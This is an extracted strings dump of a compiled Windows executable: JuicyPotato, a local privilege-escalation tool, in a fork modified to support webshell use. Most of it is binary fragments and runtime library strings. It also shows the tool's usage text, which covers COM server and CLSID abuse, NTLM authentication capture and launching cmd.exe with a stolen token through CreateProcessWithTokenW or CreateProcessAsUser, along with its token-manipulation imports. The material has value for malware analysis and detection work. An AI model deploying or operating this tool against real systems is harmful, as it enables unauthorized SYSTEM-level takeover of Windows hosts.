!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.gfids
@.rsrc
@.reloc
PWh#
YY^]
u$WSQ
^_[]
h@	D
MEOW
SVWh
QVPj
h,}C
hX}C
PQVW
NTLM3
QRPj
w<;_4r93
;W4s
D$8Wj
D$ P
D$0Pj
=|	D
u@h,
hd	D
Phd	D
SVWh
QRhP	D
hh}C
hp~C
hx~C
hh}C
hp~C
hx~C
5p	D
=t	D
5p	D
5p	D
SVWP
_DWS
Y_^[
wM9q
_^[]
QQVW
YY_^
7j$V
9C(t
9C(tV
9C(t
hra@
u&h,
j Y+
Y__^[
tB+}
8csm
v	N+D$
8csm
Y__^[
ineI
5ntel
5Genu
t#=`
<j S
VhQf@
YY^]
N)^]
PSVW
Y_^[
}fV3
Q$B@;
G @;G
G @;G
_^[]
G ;G
G ;G
)j j
u-!~
Vh(o@
SVWh
QQVj
PSVW
Y_^[
7j(V
Wj4XPV
s,Pj
t*kU
;Kdt
4Y;s
GDQSP
OHPSQ
OHSSVSSW
t}PP
tIVW
;Xdt
A(;A,v
O,9O(vV
;B$vw
+B$9B
+J$+
+B$+
B0C;_
u	9w 
;F$s
t\QSV
v'QS
jd[+
;F$vj
;F,r
;F0r
t|;E
+A$tp
9Y,s
;J,r
;B0r
tW;U
V,)^
^ _^
;A$vH
F,_^
+A Vj$
^@;A
+AHVj(
^@;A
C$F;w
QSVWj
N PSQ
FT9~Xt0
9~Xt#
;wdt#
;{$w
QQS3
9G$v0
9G$s$
9G$v
v	PQ
@(;A(s
9wLt7
QSVW
+A$tW3
vM!E
G(9_Lu8
QVW3
tq9Z
v@SW
 SVW
;Wdt
v7;u
;H u
;H v
;wdt
QQSVW
tFj0
;{dt
wXj@
SPPWh
t8V3
9w(~
FYY;w(|
t5V3
9w(~
FY;w(|
;V<|
t-h\
 SVW
9V(~-
;V(|
V<;V8}	
9w,~$
YYF;w,|
9w,~$
YYF;w,|
r ;E
9s,~g
9Hx~G
;Nx|
;s,|
_^[]
t#9w
8_Lu
QQVW
9~,~B
G;~,|
9~,~9
G;~,|
9P,u
9~P~6
G;~P}
G@WVPR
_^[]
GxVPR
h{]A
9s(~&
;{(|
u,j8
u<j<
_^[]
QQSV
CxPj
~4SW
Y_^]
;V<|
F4S;
;FD~a
;FD~O
NHB3
;V<|
F4S;
;FD~a
;FD~O
NHB3
_^[]
9~,~k
C8;sx|
;~,|
QQVW
tWVWj>
j@Xf
_^[]
~BS3
 SVW
9V(~-
;V(|
V<;V8}	
Od_^]
_^[]
u$jt
j,hx
9_dt
9_du
9_Pu
t@;wPt
_^[]
Gh;G<
a;w0tV
:;w0tBj
_^[]
;w0t
@_^[
YY_^
-;{0t7
FP;FL~
#9Npt
_^[]
;V<|
F4S;
;FD~Y
;FD~G
NHB3
t]VWj>
j@Xf
}:;2|6
Y_^[
NdWj
9_ u
@@;~
9pdt<V
tH~B
8_^[
9Idt
9Idt
Y_^[
QVWjt
YY_^
(SVW
9vdtG
y!!}
9vdu
YY^]
t	9E
j(h<
tQ9M
N,^]
_^[]
kV$4
Vj@Z3
 SVW
Vj@^
QSVW
t/h8
t	RQ
Y_^[
x(kP$4
QkK04
_^[h8
kK$4
VkP$4
kW$4k_(4
C$u'
kW$(
AHkO($
kK04k
t,j<
w	9Z
9^(w
VkP$4
QQkU
G,_^[
;@8u
t	RQ
YY^]
t4;C
!F0f
PSVW
Y_^[
F<PS
F<PW
_(Ku
SVWh
X_^]
_^[]
0_^]
QQVWj
;V<|
F4S;
;FD~[
;FD~J
NHB3
9_|t
9_|u
t]VWj>
j@Xf
Ga_[
t5V3
9w(~
FY;w(|
YY_^
 SVW
9V(~-
;V(|
V<;V8}	
QQSVW
QSVW
9XXt
9sx~ 
F;sx|
^_[]
9~x~'
G;~x|
_^[]
_^[]
_^[]
Y_^]
QSVW
QQSVW
QQVW
h?KA
uQVW
SVW3
r9u'
j@SV
O`j@SV
t5V3
9w(~
FY;w(|
;V<|
F4S;
;FD~[
;FD~J
NHB3
u)j,
j@SP
t8V3
9w(~
FYY;w(|
t:V3
9w(~
F;w(|
 SVW
9V(~,
;V(|
V<;V8}	
 SVW
9V(~,
;V(|
V<;V8}	
 SVW
9V(~0
;V(|
V<;V8}	
u0j,
QSVW
AP;AL
4SVW
u78E
BP;BL
;V<|
F4S;
;FD~Y
;FD~G
NHB3
W;FL
~98]
HP;HL
_^[]
F88]
tJVW
C,H_^u
GH_^
;3|m
_^[]
_^[]
FHS3
tM9Xp~H
8Y`t
uNSVW
QSVW
$_^[
ALHu
;sPt
9wPt
GLHu
;GPu
9GPt
[_^]
G0_^]
9~Tu
9~Pu
YYuX
9{$t
@,+B
_^[]
_^[]
_^[]
_^[]
PRQW
PRQW
QQSV
QQSV
t,8]
[_^]
GxPj
8csm
?csm
8csm
>csm
>csm
>csm
u PW
?MOC
?RCC
|c;F
@u(j
u Qj
97~%
_^[]
YYPV
8RCC
8MOC
8csm
9p u"
:csm
ft%9q
:csm
r39z
@_^[]
@_^[]
oF f
oF f
oF f
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
FGIu
QQSVWd
;p$u
oF f
oF f
oF f
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
FGIu
vZWh
vZWh
h,!C
PPPh
8_^]
xj~W
8csm
YY;E
YY;E
YYhd
h`!C
BVj(j
j Y+
j Y+
_^[]
^_[]
VhL"C
hH"C
hL"C
j2X^]
Vh`"C
h\"C
h`"C
j2X^]
Vhx"C
ht"C
hx"C
j2X^]
j2X^]
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
SVWUj
]_^[
;t$,v-
UQPXY]Y[
~8@_
F4^[]
QQSV
~8@_
F4^[
	<et
<Pt8
y1*t
A1<Fu
<Nu&
u<dt
<Xu]
^$+^8+
y1*t
F1<at
<At	
F1<gt
v(PQ
F1<gt
N @@
F8SP
9F(~
u&9E
C;^8u
PPPPP
VVVVV
VVVVV
SVWjA_jZ+
uBjAYjZ+
t:f;
~0WPQ
f90t	
f90u
PVSQSWV
PVSQj
QVVVj
j Y+
t#Vh
j Y+
99t	
wOtD
f9;u
PWWS
A98u
j"Xf9
t	f;E
j"Xu
@f91t
j"^f91j\^u8
u 8]
j"^f9q
j\^u
t*8]
t/j=[f;
Cf93u
PPPPP
Y_^]
KSSj
t1SVj
j Y+
j Y+
j Y;E
j Y+
j _;
j Y+
j Y+
hh+C
hh+C
=4	D
-@AC
=4	D
,0<	w
_^[]
^[_]
Vh(2C
h 2C
Vh02C
h(2C
Vh82C
h02C
h82C
TVh 2C
SVW3
~';_
GWVj	
QVWSj
j X+
j X+
f9:t
f9:t
f9:t
f9:t
f9:t
FLY;
uIhd
uQhd
_^[]
0SVW
u$SW
8] j0
j0Yf
v6j0
Wj0XPV
jdSQ
Fj0X
80t/
-jd_;
PPPPP
Wj0V
_^[t
QWPV
 _^[
PPPPP
QQVW
u,t6
$[_^
_[^]
x7;5
Ht$;}
SShU
(@t	
taj*Xf
j?Xf
PPPPP
PPPPP
VWj\^j:
j\Zf;
j:Zf;
WWWPWS
PWWS
t-f9
u	f9
j.Xu
hFTB
_^[]
IH;A
SSVWh 
9wLt
X_^]
f9:t!V
f9:u
}VWj=S
SSSSS
PPPPP
QQSWj0j@
Y_[^]
xg;5
_^[]
_^[]
SVWf9
_^[]
9E WW
t4SWV
Y_^[
YY^]
35,	D
j,hP
j Y+
j@%@
(%@@C
(-P@C
ZYXu
ZYXu
=4	D
-@AC
-TAC
SVW3
9E(j
PPPPPWS
QQQP
PP9E u:PPVWP
wIPS3
j Y+
j X+
jrY;
j Y+
j X+
jrY;
j X+
j X+
jrY;
stW;
stW;
_^[t
PPPPP
@( t
@_^]
PPPPPPPP
mSjA[jZ^+
8jZZf;
(SWS
- lC
- lC
-,lC
=8	D
x7;5
<$tL
=4	D
-@AC
=4	D
|%=2
QQQP
 SVW3
 SVW3
QQSV
;csm
?csm
t/jT
8MOC
8RCC
tujT
<$Xf
_^[]
Y_^[
Y_^[
WVU3
v	N+D$
^_[3
Unknown exception
bad allocation
device or resource busy
invalid argument
no such process
not enough memory
operation not permitted
resource deadlock would occur
resource unavailable try again
generic
string too long
invalid string position
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
not a directory
not a socket
not a stream
not connected
not supported
operation canceled
operation in progress
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
unknown error
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
bad array new length
Lock already taken
pEvents
SetThreadGroupAffinity
GetThreadGroupAffinity
GetCurrentProcessorNumberEx
GetLogicalProcessorInformationEx
count
pScheduler
version
eventObject
ppVirtualProcessorRoots
SchedulerKind
MaxConcurrency
MinConcurrency
TargetOversubscriptionFactor
LocalContextCacheSize
ContextStackSize
ContextPriority
SchedulingProtocol
DynamicProgressFeedback
WinRTInitialization
MaxPolicyElementKey
Mbp?333333
pContext
pExecutionResource
RoInitialize
RoUninitialize
Y/}J
rLp>B
1eaB@
RegisterTraceGuidsW
UnregisterTraceGuids
TraceEvent
GetTraceLoggerHandle
GetTraceEnableLevel
GetTraceEnableFlags
pThreadProxy
proc
switchState
bad exception
Main Invoked.
Main Returned.
Access violation - no RTTI data!
Bad dynamic_cast!
EventRegister
EventSetInformation
EventUnregister
EventWriteTransfer
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 new
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`RTTI
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator "" 
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
( 8PX
700WP
`h````
xpxxxx
(null)
CorExitProcess
sqrt
LocaleNameToLCID
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
e+000
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
fUUU
d8L2
[aOni*{
@2&@
"RP(
eLK(w
FEMh
h0'D
owM&
~ $s%r
@b;zO]
$qE}
;*xh
["93
iu+-,
\lo}
obwQ4
&Sgw
R	E]
?nz(
=87M
v2!L.2
	cQr
X/4B
k=yI
^<V7w
W&|.
1#INF
1#QNAN
1#SNAN
1#IND
log10
asin
acos
sqrt
?RbSQ
<zQ}<
_/:>
<8bunz8
cC<-
v<'*6
<)TH
<$"U
e<bN
{<6w
<\%>
l,kg<i
<'Za
<@En[vP
log10
tanh
atan
atan2
ceil
floor
fabs
modf
ldexp
_cabs
_hypot
fmod
frexp
_logb
_nextafter
sinh
cosh
lzZ?
	k8=
?5Wg4p
Nv$^
w(@	
BC .=
(lX 
#{ =
`~R=
}s"=
%S#[k
"B <1=
\-!y
#.X'=
i9+=
Error in AquireCredentialsHandle
Buffer sizes incompatible - can't replace
[+] clsid: %S
[+] Domain\UserName: %S\%S
JuicyPotato v%s 
Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both (default t)
-p <program>: program to launch
 (default c:\windows\system32\cmd.exe)
-l <port>: COM server listen port (default 2333)
Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default null)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
[-] Error - Unknown NTLM message type...
[-] WSAStartup failed with error: %d
127.0.0.1
[-] getaddrinfo failed with error: %d
[-] socket failed with error: %ld
[-] Unable to connect to server!
[-] RPC -> send failed with error: %d
[+] RPC-> Connection closed
[-] RPC -> recv failed with error: %d
[-] bind failed with error: %d
[-] listen failed with error: %d
[-] accept failed with error: %d
[-] COM -> send failed with error: %d
[-] COM -> recv failed with error: %d
[-] shutdown failed with error: %d
[-] Priv Lookup FALSE
Priv Adjust FALSE
Modifying JuciyPotato by Uknow to support webshell
Github: https://github.com/uknowsec/JuciyPotato 
JuciyPotato by ohpe
Github:https://github.com/ohpe/juicy-potato
[X] Wrong Argument: %s
[+] Testing clsid: %S lport: %S
[+] authresult %d
[-] Error getting token type: error code 0x%lx
[+] CreatePipe success
[+] CreatePipe failed
[+] Command: %S
[+] CreateProcess call : <t> CreateProcessWithTokenW
[-] CreateProcessWithTokenW Failed to create proc: %d
[+] CreateProcessWithTokenW success
[+] Process with pid: %d created.
==============================
[+] CreateProcess call : <u> CreateProcessAsUser
[-] CreateProcessAsUser Failed to create proc: %d
[+] CreateProcessAsUser success
[+] Process with pid: %d created.
==========================================
[+] Waiting for auth...
deque<T> too long
ETW0
InvokeMainViaCRT
"Main Invoked."
FileName
ExitMainViaCRT
"Main Returned."
FileName
Microsoft.CRTProvider
RSDS
D:\mycode\juicy-potato-master\JuicyPotato\Release\JuicyPotato.pdb
GCTL
.text
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPB
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.bss
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
AcquireCredentialsHandleW
AcceptSecurityContext
QuerySecurityContextToken
Secur32.dll
CreateThread
ReadFile
GetCurrentProcess
GetLastError
CreatePipe
WTSGetActiveConsoleSessionId
WaitForSingleObject
TerminateThread
CloseHandle
Sleep
KERNEL32.dll
GetTokenInformation
GetLengthSid
CopySid
LookupAccountSidW
LookupPrivilegeValueW
AdjustTokenPrivileges
OpenProcessToken
DuplicateTokenEx
CreateProcessWithTokenW
CreateProcessAsUserW
ADVAPI32.dll
CLSIDFromString
CoTaskMemAlloc
CoInitialize
CreateILockBytesOnHGlobal
StgCreateDocfileOnILockBytes
CoGetInstanceFromIStorage
ole32.dll
getaddrinfo
freeaddrinfo
WS2_32.dll
EnterCriticalSection
LeaveCriticalSection
TryEnterCriticalSection
DeleteCriticalSection
GetCurrentThreadId
WideCharToMultiByte
QueryPerformanceCounter
SetLastError
InitializeCriticalSectionAndSpinCount
CreateEventW
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetSystemTimeAsFileTime
GetTickCount
GetModuleHandleW
GetProcAddress
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
GetCurrentProcessId
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
CreateTimerQueue
SetEvent
WaitForSingleObjectEx
SignalObjectAndWait
SwitchToThread
SetThreadPriority
GetThreadPriority
GetLogicalProcessorInformation
CreateTimerQueueTimer
ChangeTimerQueueTimer
DeleteTimerQueueTimer
GetNumaHighestNodeNumber
GetProcessAffinityMask
SetThreadAffinityMask
RegisterWaitForSingleObject
UnregisterWait
EncodePointer
GetCurrentThread
GetThreadTimes
FreeLibrary
FreeLibraryAndExitThread
GetModuleFileNameW
GetModuleHandleA
LoadLibraryExW
GetVersionExW
VirtualAlloc
VirtualFree
VirtualProtect
DuplicateHandle
ReleaseSemaphore
InterlockedPopEntrySList
InterlockedPushEntrySList
InterlockedFlushSList
QueryDepthSList
UnregisterWaitEx
LoadLibraryW
RaiseException
RtlUnwind
ExitProcess
GetModuleHandleExW
HeapAlloc
HeapFree
GetStdHandle
WriteFile
MultiByteToWideChar
GetCommandLineA
GetCommandLineW
GetACP
CompareStringW
LCMapStringW
GetFileType
FlushFileBuffers
GetConsoleCP
GetConsoleMode
GetProcessHeap
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetOEMCP
GetCPInfo
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
SetFilePointerEx
WriteConsoleW
HeapSize
HeapReAlloc
DecodePointer
CreateFileW
SystemFunction036
qj"*
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVinvalid_argument@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVruntime_error@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AVstl_critical_section_interface@details@Concurrency@@
.?AVstl_critical_section_vista@details@Concurrency@@
.?AVstl_critical_section_win7@details@Concurrency@@
.?AVstl_critical_section_concrt@details@Concurrency@@
.?AVstl_condition_variable_interface@details@Concurrency@@
.?AVstl_condition_variable_vista@details@Concurrency@@
.?AVstl_condition_variable_win7@details@Concurrency@@
.?AVstl_condition_variable_concrt@details@Concurrency@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVimproper_lock@Concurrency@@
.?AVWaitBlock@details@Concurrency@@
.?AVSingleWaitBlock@details@Concurrency@@
.?AVMultiWaitBlock@details@Concurrency@@
.?AVWaitAllBlock@details@Concurrency@@
.?AVWaitAnyBlock@details@Concurrency@@
.?AVTimedSingleWaitBlock@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PAVContext@Concurrency@@@details@Concurrency@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AVscheduler_worker_creation_error@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVimproper_scheduler_attach@Concurrency@@
.?AVimproper_scheduler_reference@Concurrency@@
.?AVcontext_unblock_unbalanced@Concurrency@@
.?AVcontext_self_unblock@Concurrency@@
.?AVmissing_wait@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_scheduler_policy_value@Concurrency@@
.?AVinvalid_scheduler_policy_thread_specification@Concurrency@@
.?AVnested_scheduler_missing_detach@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVResourceManager@details@Concurrency@@
.?AUIResourceManager@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUITopologyNode@Concurrency@@
.?AUTopologyObject@GlobalCore@details@Concurrency@@
.?AUTopologyObject@GlobalNode@details@Concurrency@@
.?AVScheduleGroupBase@details@Concurrency@@
.?AVScheduleGroup@Concurrency@@
.?AVCacheLocalScheduleGroup@details@Concurrency@@
.?AVFairScheduleGroup@details@Concurrency@@
.?AVSchedulerBase@details@Concurrency@@
.?AVScheduler@Concurrency@@
.?AU_Chore@details@Concurrency@@
.?AVRealizedChore@details@Concurrency@@
.?AVCacheLocalScheduleGroupSegment@details@Concurrency@@
.?AVScheduleGroupSegmentBase@details@Concurrency@@
.?AVFairScheduleGroupSegment@details@Concurrency@@
.?AVContextBase@details@Concurrency@@
.?AVContext@Concurrency@@
.?AV_Interruption_exception@details@Concurrency@@
.?AV_RefCounter@details@Concurrency@@
.?AV_CancellationTokenRegistration@details@Concurrency@@
.?AVCancellationTokenRegistration_TaskProc@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PAVevent@Concurrency@@@details@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AVSchedulerProxy@details@Concurrency@@
.?AUISchedulerProxy@Concurrency@@
.?AVFreeThreadProxy@details@Concurrency@@
.?AVThreadProxy@details@Concurrency@@
.?AUIThreadProxy@Concurrency@@
.?AUIThreadProxyFactory@details@Concurrency@@
.?AVFreeThreadProxyFactory@details@Concurrency@@
.?AV?$ThreadProxyFactory@VFreeThreadProxy@details@Concurrency@@@details@Concurrency@@
.?AVVirtualProcessor@details@Concurrency@@
.?AVInternalContextBase@details@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExternalContextBase@details@Concurrency@@
.?AVThreadScheduler@details@Concurrency@@
.?AUIScheduler@Concurrency@@
.?AVThreadInternalContext@details@Concurrency@@
.?AVVirtualProcessorRoot@details@Concurrency@@
.?AUIVirtualProcessorRoot@Concurrency@@
.?AVFreeVirtualProcessorRoot@details@Concurrency@@
.?AVThreadVirtualProcessor@details@Concurrency@@
.?AVbad_exception@std@@
.?AV__non_rtti_object@std@@
.?AVbad_typeid@std@@
.?AVbad_cast@std@@
.P6AXPAV__ExceptionPtr@@@Z
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count@V__ExceptionPtr@@@std@@
.?AV?$_Ref_count_del_alloc@V__ExceptionPtr@@P6AXPAV1@@ZU?$_DebugMallocator@H@@@std@@
.?AVIStorageTrigger@@
.?AUIStorage@@
.?AUIMarshal@@
.?AUIUnknown@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
1`2t2
3+3N477X7]7l7
8:9D9K9
<$<`<h<
<&=5=
1 1*101a1
2)2~2
303D3]3k3{3
4<4w5
5)6@6u6
7?7c7q7w7
8(8.8y8
; ;<;B;O;X;^;z;
;7<D<M<X<^<
<"=8=F=N=c=h=s=y=
>'>1>D>H>L>P>T>X>\>`>d>h>l>
>f?x?
0/080b0i0|0
1#1)1C1I1Z1
1"2'222Q2t2
3)3B3n3v3|3
4,4C4I4O4`4j4v4|4
4&55566B6
:A:`:}:
;-;M;c;i;u;z;
;P<t<
L0Y0f0
6<6O6f6
677w7
7$8G8
909:9D9b9u9
;/=5=<=C=I=N=T=Z=`=e=k=q=w=|=
>#>)>/>4>:>@>F>K>Q>W>]>b>h>n>t>y>
? ?&?,?1?7?=?C?H?N?T?Z?_?e?k?q?v?|?
0#0)0.040:0@0E0K0Q0W0\0b0h0n0s0y0
1#1>1D1v1
2,222I2O2j2p2
3/353N3T3m3s3
4*404N4T4m4s4
5!5(5/565=5D5K5S5[5c5o5x5}5
6!6(6/666=6D6K6R6Z6b6j6u6z6
677`7
8	8*8/8<8
:):<:H:X:i:
:.;;;b;j;
;&<]<
<%>=>C>W>t>
?)?/?V?|?
0A1J1O1u1z1
2)242
3*313g3p3}3
4(4E4V4
8D9y9
:O;*<^<
<#=V=q=
>H>W>
F0S0a0f0l0~0
5K6^6
7$8O8
:::G:
<$<G<
=,=8=>=D=K=U=i=t=
=	>.>N>f>p>
>!?9?>?D?K?W?u?
0>0f0m0
1<1S1]1}1
2!2+2K2a2t2
3)373A3G3R3_3f3
4+4H4}4
6-6B6Y6j6{6
7/7?7l7
7B8b8y8
9'9=9
;&;R;
<<<F<K<Q<X<b<|<
<)=O=[=f=m=
050_0x0
0V1]1l1,2A2I2
424b4
5/5>5H5Q5b5q5x5
607:7C7T7c7j7
<d=q=y=
>%>/>5>;>N>U>c>p>}>
7Z8*9?9L9]9x9
0 0*0:0I0Z0
7	8!8
9?:S:]:w:
;2;M;r;
=4>|>
>'?4?N?
1i2v2
5%525<5Q5]5f5u8
:::k:
?4???\?b?s?
3(3-3
455:5
9'9h9y9
;#<<<L<W<
> >,>2>
1N1k1
657:7A7O7d7p7_8
849C9M9_9l9~9
1 2D2P2|2
7n8~8
2/2;2{2
>0>e>X?
1G3b3}3
4'4m4
4L5g5
6L6j6
:':4:
>)?A?[?
5"666;6Y6f6
7c8y8
<l>o?
1"1,171>1E1O1b1h1n1u1
2F2y2
2H3g3
5"5+585E5
7%757D7K7X7a7n7x7
8%8/858;8A8S8`8f8l8{8
9>9X9
:::?:F:K:R:]:m:w:}:
S3n3u3
757;7]7d7
?S?g?n?
0'040I0O0u0
=2O2<5
5+7F7M7x7
8N9f9
:Q;c;
203(4
95<B<f<}<
1:2W2o2a3
3(4K4
445=5[5f5o5}5
686v6
7>7N7T7Z7i8
>Y?x?
N0k0
2C3l3
344[4y4
667C7k7
868G8U8l8r8
9;9V9
U1\1e1l1
90Z0u0
0<1T1Z1d1s1/3_7
;d>w>
0;1@1D1H1L164
4?5W5\5
; ;v;
;6>M>h>
?'?7?O?z?
1,1%282
2Z3u3
949\9p9
9>:P:U:^:q:
:&;B;Q;];k;
; <%<*<Z<_<d<
=!=E=Q=V=[=
>E>Q>h?
0q0}0
1H1b1q1
2/2<2J2X2c2y2
4;6)737@7s7
7L8S8
=B={=8>
?-?4?@?S?X?d?i?z?
0'010:0K0]0x0
0=1C1o1u1
2.2I2T2
4'494E4M4e4
4D5M5
7F9c9
:!:6:;:E:J:U:`:m:{:
;Y;e;j;p;u;};
;?<H<t<}<
>!>p>
0D0V0
1+111<1D1O1U1`1f1t1
223=3O3
5%8U8
9 979?9f9
:4:P:[:`:e:
;,;6;R;];b;g;
<"<U<y<
=#=7=<=A=c=q=
>$>1>6>D>
>"?=?x?
4N5v6)8y8
8%9!:5:
:j;q;
<#<,<a<r<
<!=+=
4(5/5?5N5U5m5t5
:G:\:m:
:	;I;e;
;@<_<
1#1E1
2/393
798e8n9
:7:U:_:p:u:
>7><>G>[>f>}>
?E?{?
 0T0{0
192K2_2l2
6M6\6j6
7J7Q7
818C8U8g8y8
9*9<9N9`9
"0F0z0
1(252B2O2f2-3
484%5Y7
:*:K:o:{:
<A=x=
5%5D5?6
6n7,8
)0m3t3{3
3Y5`5
5I6|6
848W8
;&=C?I?
1J1u1
2'2l2x2
3U4t4
5f6|6
787r8
979D9t9
:I;O;T;Z;k;E>
'3*4;4r7
91:=:Q:]:i:
;/;;;J;5<
343A3T3
4'5F5T5a5m5
6R7a7
8x96:;:M:k:
:1;N;
<">h?
00Z0
2?2h2
3N3q3
3&4A4s4
4!5J5s5
6)7]7
9*9S9y9
:L:y:
;C;l;
<9<_<
=8=v=
=O>u>
?$?O?z?
0B0k0
1S1{1
X2`2d2h2l2p2t2
3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3H4L4P4T4X4\4`4d4h4l4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
H3L3P3T3X3\3`3|3
4 4$4(4,4044484<4H4L4P4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7P7T7X7\7`7d7h7l7p7t7x7|7
7H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8h9l9p9t9x9
9,:0:4:8:<:@:D:H:L:P:T:X:\:`:t:x:|:
:0<4<8<<<@<D<H<L<P<T<
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
